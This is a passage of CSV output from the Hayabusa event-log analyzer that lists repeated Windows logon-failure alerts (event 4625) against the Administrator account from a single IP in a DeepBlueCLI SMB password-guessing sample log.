NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: 